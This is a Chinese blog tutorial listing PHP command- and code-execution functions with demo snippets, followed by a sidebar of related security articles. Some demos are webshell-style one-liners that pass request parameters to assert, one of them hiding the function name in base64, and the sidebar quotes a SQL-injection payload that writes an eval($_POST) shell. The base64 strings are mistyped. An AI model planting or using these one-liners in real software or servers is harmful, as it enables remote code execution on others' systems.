RCE漏洞函数

最新推荐文章于 2024-11-18 20:50:55 发布
最新推荐文章于 2024-11-18 20:50:55 发布
阅读量1.1k 收藏 14
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liyuanxiaocilang/article/details/141115043
版权

一、rce漏洞概述


        在Web应用开发中为了灵活性、简洁性等会让应用调用代码执行函数或系统命令执行函数处理,若应用对用户的输入过滤不严,容易产生远程代码执行漏洞或系统命令执行漏洞;

二、常见RCE漏洞函数


1.系统命令执行函数


(1)   system():能将字符串作为OS命令执行,且返回命令执行结果;自带有“输出”,直接输出即可实现。

实例测试:

在文件中写入结果 :

<?php

system('echo "<?php phpinfo();//" > 11111.php');

结果实现 :  先输入   127.0.0.1/demo.php    页面创建成功后输入   127.0.0.1/11111.php  即可

 

(2)exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显);没有“输出” 需要自己写入,才可实现。

实例测试:

<?php

// 输出运行中的 php/httpd 进程的创建者用户名

// (在可以执行 "whoami" 命令的系统上)

$output=null;

$retval=null;

exec('whoami', $output, $retval);

echo "Returned with status $retval and output:\n";

print_r($output);

?>

结果实现:

(3)passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;与system() 类似,也可以直接输出。

实例测试:

<?php

passthru("whoami");

?>

(4)shell_exec():能将字符串作为OS命令执行,通过 shell 执行命令并将完整的输出以字符串的方式返回。

实例测试:

<?php

$output = shell_exec('whoami');

echo "<pre>$output</pre>";

?>

(5)popen():打开进程文件指针,fread管道 ,打开了一个指向进程的管道,该进程由派生给定的 command 命令执行而产生。

注:有一个模式   'r' 表示阅读,'w' 表示写入。

在 Windows 上,popen() 默认是文本模式,即任何从管道中读取/写入的 \n 字符都将转换为 \r\n。如果避免这种情况,可以通过将 mode 设置为 'rb' 和 'wb' 来强制执行二进制模式。

实例测试:

<?php

$handle = popen('whoami', 'r');

echo "'$handle'; " . gettype($handle) . "\n";

$read = fread($handle, 2096);

echo $read;

pclose($handle);

?>

(6)proc_open():与popen()类似,但是 proc_open() 提供了更加强大的控制程序执行的能力。

pcntl_exec():在当前进程空间执行指定程序;

<?php

$descriptorspec = array(

   0 => array("pipe", "r"),  // 标准输入,子进程从此管道中读取数据

   1 => array("pipe", "w"),  // 标准输出,子进程向此管道中写入数据

   2 => array("file", "d:/aaa.txt", "a") // 标准错误,写入到一个文件

);

$process = proc_open('whoami', $descriptorspec, $pipes);

if (is_resource($process)) {

    $output =stream_get_contents($pipes[1]);

    fclose($pipes[1]);

    $returnValue =proc_close($process);

    echo "0utput:".$output;

    echo "Return Value:".$returnValue;

}

?>

注:反引号``:反引号``内的字符串会被解析为OS命令;

2.代码执行函数


(1)eval():将字符串作为php代码执行;

(2)assert():将字符串作为php代码执行;

(3)call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数;

<?php

call_user_func('assert',$_REQUEST['pass'])

?>

127.0.0.1/demo.php?pass=phpinfo()

 

(4)array_filter():使用回调函数过滤数组的元素

base64 :assert 编码  YXzZXJ0

<?php

$e = $_REQUEST['e'];  //编码assert

$arr = array($_POST['pass'],);  //phpinfo()

array_filter($arr,base64_decode($e));  //'assert'

?>

127.0.0.1/demo.php?pass=phpinfo()&e=YXNzZXJO

注:可变函数:若变量后有括号,该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行;

雷柏年
关注
rConfig v3.9.2 RCE漏洞分析1
08-03
总的来说,rConfig v3.9.2的这两个RCE漏洞揭示了在开发过程中对用户输入处理的重要性以及对安全编程实践的遵循。通过学习这些案例,我们可以更好地理解如何避免类似的安全问题,并提高我们系统的安全性。
RCE漏洞函数总结
weixin_51692662的博客
08-17 827
phprce,命令执行,代码执行
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1....通过以上分析可以看出,ThinkPHP 5.0.x/5.1.x中的变量覆盖RCE漏洞是由于不安全的数据处理和变量管理造成的。开发者应加强对框架内部实现的理解,并遵循最佳安全实践,以减少类似的安全风险。
Spring framework deserialization RCE漏洞分析以及利用1
08-08
如果JNDI应用加载的类中包含恶意代码,并且这个类的构造函数执行了恶意操作,那么在lookup过程中,RCE漏洞就会被触发。以下是一个简单的示例代码,展示了如何设置`codebase url`: ```java Registry registry = ...
fastjson1.2.24反序列化RCE
06-24
**Fastjson 1.2.24 反序列化...总结来说,Fastjson 1.2.24反序列化RCE漏洞是由于库的反序列化机制中存在的缺陷,攻击者可以通过构造恶意JSON数据来执行任意代码。理解和防范这类漏洞对于保障应用程序的安全至关重要。
PbootCms-3.04前台RCE挖掘过程1
08-03
通过对PbootCms-3.04版本中RCE漏洞的挖掘过程进行详细分析,可以看出开发者在设计模板引擎时对安全性的考虑不足,导致了远程代码执行漏洞存在。攻击者可通过构造特定的payload绕过正则表达式的限制,最终实现任意...
案例精选 | 某知名教育集团基于安全运营平台的全域威胁溯源实践
juminfo的博客
11-18 439
某知名教育集团成立于1999年,总部位于北京海淀中关村。集团专注于K-12基础教育,构建了从幼儿园到高中的全面教育体系,涵盖学校管理、教学科研、师资培训、信息化服务等多个方面。集团在全国范围内设有15所小学、12所初中、9所高中、6个国际部、2个大学预科项目和近30所幼儿园,拥有在校学生5万余人,现已发展成为中国领先的民办基础教育机构之一。近年来,在“互联网+教育”国家战略的指引下,该集团积极响应,将信息技术深度嵌入教育教学过程,构建了高效的教学质量监控云平台和先进的教学信息化系统。
等保二级需要哪些安全设备?
bocco的博客
11-15 585
同时,还应加强安全管理措施的实施,提高员工的安全意识和能力,共同维护企业的信息安全。这些设备能够实时监测机房内的温湿度、漏水情况,一旦超出预设范围,便会自动报警,及时采取措施,确保服务器在适宜的环境中稳定运行。1. 防火墙:防火墙是网络安全的第一道屏障,能够控制进出网络的数据包,防止未经授权的访问和恶意攻击。在等保二级中,应部署下一代防火墙,其不仅具备传统防火墙的功能,还集成了入侵防御、防病毒等功能,能够更有效地保护服务器的安全。通过部署日志审计系统,可以及时发现并处理网络中的异常行为,提高网络的安全性。
JWT深度解析:Java Web中的安全传输与身份验证
2401_85760095的博客
11-14 641
JSON Web Token(JWT)是一种轻量级的身份验证和授权标准,它允许在各方之间安全地传输信息。JWT作为一种安全传输信息和身份验证的解决方案,在Java Web开发中扮演着重要角色。它通过紧凑、自包含的方式传输用户信息,同时支持无状态和跨域认证,使得JWT成为现代Web应用中不可或缺的一部分。JWT是一种紧凑的、URL安全的令牌,用于在各方之间安全地传输信息。JWT的结构允许其轻松地在不同的系统之间传输,并且能被携带在URL的参数中,同时也支持在POST请求体中作为表单数据发送。
一些常见网络安全术语
最新发布
Hacker_xingchen的博客
11-18 800
(2)  蜜罐好比是情报收集系统,蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击,所以攻击者如前后,就可以知道攻击方如何得逞的,随时了解对服务器发动的最新攻击和漏洞,还可以通过窃听黑客之间的联系,手机黑客所用的种种工具,并且掌握他们的社交网络。在计算机科学中,社会工程学指的是通过与其他人的合法地交流,来使其心理受到影响,做出某些动作或者透露一些机密信息的方式,这通常被认为是一种欺诈他人以收集信息/行骗和入侵计算机系统的行为,在英美普通法系中,这一行为一般是被认为侵权隐私权的!这是一顶黑帽子的反面。
Spring MVC 中是如何保证Controller的并发安全
每日一贴
11-18 825
Spring MVC 保证Controller单例无状态设计默认是单例,因此控制器应设计为无状态。避免使用共享的可变实例变量:控制器中不应包含任何共享的可变实例变量,以免在并发访问时发生线程安全问题。使用存储线程独立的临时状态:当需要共享一些临时状态时,使用来隔离数据。使用局部变量存储临时数据:将中间状态或临时数据存储在局部变量中,以确保每个请求的隔离性和线程安全。通过这些设计原则和代码实践,Spring MVC 的Controller能够在高并发环境中有效保证线程安全
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 884
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
富格林:安全指正规防欺诈套路
fgl100的博客
11-18 248
事实上,现货黄金市场的不确定性,没有人能每一次都百分百预测到未来的行情波动情况,高手也是如此,因此过于相信大师的判断也不可取。此外,还需提高自己的自信心,在判定行情走势后,要快准狠的下单,如果真的很担心判断错误可以先轻仓入市待行情走势如期,再考虑加仓。还有一点就是进行交易时要稳定,患得患失的心态是很不好的,能盈利多少我们可以事先预设好,比如可以多设几个目标点位等。富格林指出,在现货黄金投资操作中,有众多的投资技巧和投资方式,但其实并不是所有的都适用。投资者应该注意选择安全、可信的投资方式去规防欺诈套路。
CertiK安全调研报告:Web3.0桌面钱包的初步安全评估
weixin_58310340的博客
11-15 630
本报告呈现了对多个桌面钱包的分析和结论,旨在提升所有Web3.0成员的安全意识。我们期望通过这份报告,提醒用户在使用桌面钱包时保持高度警觉,保护自己的数字资产。
安全见闻1-5
XLbb的博客
11-14 980
涵盖了编程语言、软件程序类型、操作系统、网络通讯、硬件设备、web前后端、脚本语言、病毒种类、服务器程序、人工智能等基本知识,有助于全面了解计算机科学和网络技术的各个方面。
Nginx安全限流配置
weixin_66855479的博客
11-18 480
虽然这个模块主要用于限制请求速率,而不是直接限制数据传输速度,但它可以间接地影响数据传输量,因为更少的请求意味着更少的数据传输。你可以设置单位时间内的请求数限制,超过限制的请求将被拒绝或延迟处理。方法:在Nginx中,限制数据传输速度通常涉及到对客户端请求或响应的带宽进行控制。要设置白名单,只允许特定的IP地址访问资源,你需要首先使用allow指令指定允许的IP地址,然后使用。这个指令允许你基于定义的区域(zone)和速率限制请求的频率。:用于区分客户端的键,这里使用客户端的IP地址的二进制形式。
内网安全、域渗透测试工具-NetExec介绍及使用(优秀)
墨痕诉清风的博客
11-14 518
NeNetExec (nxc) 是一款功能强大的自动化网络安全评估与漏洞测试工具,是 CrackMapExec-已停止维护 (CME) 的现代继任者,现已被渗透测试人员和红队成员广泛使用,可被用于多种协议下的渗透测试中。
【VLANPWN】一款针对VLAN的安全研究和渗透测试工具
2401_84466225的博客
11-18 600
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。:该脚本用于执行一次DTP交换机欺骗/劫持攻击,该脚本将发送一个恶意的DTP帧,此时会将测试人员的设备变成主干信道。学习框架已经整理完毕,现在就差资料资源了,我这里整理了所有知识点对应的资料资源文档,大家不想一个一个去找的话,可以参考一下这些资料!Hopping攻击(跳跃攻击),该脚本将注入一个包含两个802.1Q标签的帧,并发送测试目的的ICMAP请求。,该工具可以帮助广大研究人员通过对。
蓝队基础4 -- 安全运营与监控
CrossProblems的博客
11-14 681
此外,事后告警系统,如AIDE(监视系统文件的修改)等,也可以提供重要的安全信息。SOC(Security Operations Center,安全运营中心)是企业信息安全管理的重要组成部分,负责监控、分析并响应网络中的安全事件。为了有效地收集这些日志,需要配置日志源以生成日志,并将其转发给日志收集器,然后上传到SIEM(安全信息和事件管理)系统。此外,随着物联网技术的发展,楼宇管理和工控网络日志也成为了重要的日志来源,这些系统现在通常连接到企业网络,并可能成为攻击者的主要目标。
thinkphp3.2.3 rce漏洞复现
08-12
根据引用中提供的信息,ThinkPHP3.2.x存在一个RCE(远程代码执行漏洞。根据引用中的描述,我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class.php`文件中的`Memcache`类的`destroy()`函数中可以找到这个函数。请注意,如果使用PHP7,在调用有参函数但没有传入参数的情况下会报错,因此应该使用PHP5而不是PHP7。具体的漏洞利用方法是,在URL中注入`?id=1*/ into outfile "path/1.php" LINES STARTING BY '<?php eval($_POST<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [wp 篇 DASCTF Thinkphp 3.2.3RCE复现](https://blog.csdn.net/weixin_46203060/article/details/119532553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【安全漏洞】ThinkPHP 3.2.3 漏洞复现](https://blog.csdn.net/2201_75857869/article/details/129316463)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值